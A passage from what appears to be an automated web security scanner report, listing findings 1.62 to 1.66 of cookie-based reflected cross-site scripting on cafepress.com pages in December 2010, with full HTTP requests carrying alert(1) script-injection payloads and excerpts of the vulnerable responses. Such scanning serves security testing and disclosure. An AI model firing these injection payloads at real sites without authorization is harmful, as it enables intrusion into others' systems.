__utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW19 Cteonnt-Length: 58719 Date: Sun, 26 Dec 2010 13:47:28 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/ Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:28 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58719 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'ddbad</script><script>alert(1)</script>e5bee7f619b ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.62. http://www.cafepress.com/+stocking [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+stocking
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77a9a"-alert(1)-"6b71a0eba86 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stocking HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 59606 Date: Sun, 26 Dec 2010 13:49:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/ Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:02 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA77a9a"-alert(1)-"6b71a0eba86 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.63. http://www.cafepress.com/+stocking [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+stocking
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd3b0</script><script>alert(1)</script>6a078ca5ef1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+stocking HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=cd3b0</script><script>alert(1)</script>6a078ca5ef1 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59633 Date: Sun, 26 Dec 2010 13:49:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/ Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59633 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'cd3b0</script><script>alert(1)</script>6a078ca5ef1 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.64. http://www.cafepress.com/+sweatshirts-hoodies [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+sweatshirts-hoodies
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9849b"-alert(1)-"0b830c7e51f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+sweatshirts-hoodies HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 60350 Date: Sun, 26 Dec 2010 13:46:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/ Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60350 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9849b"-alert(1)-"0b830c7e51f "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.65. http://www.cafepress.com/+sweatshirts-hoodies [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+sweatshirts-hoodies
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19caf</script><script>alert(1)</script>e4e8e544a2a was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+sweatshirts-hoodies HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=19caf</script><script>alert(1)</script>e4e8e544a2a ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW18 Cteonnt-Length: 60367 Date: Sun, 26 Dec 2010 13:46:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/ Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60367 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '19caf</script><script>alert(1)</script>e4e8e544a2a ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.66. http://www.cafepress.com/+thermos [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+thermos
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 179e4"-alert(1)-"9112d7547c6 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
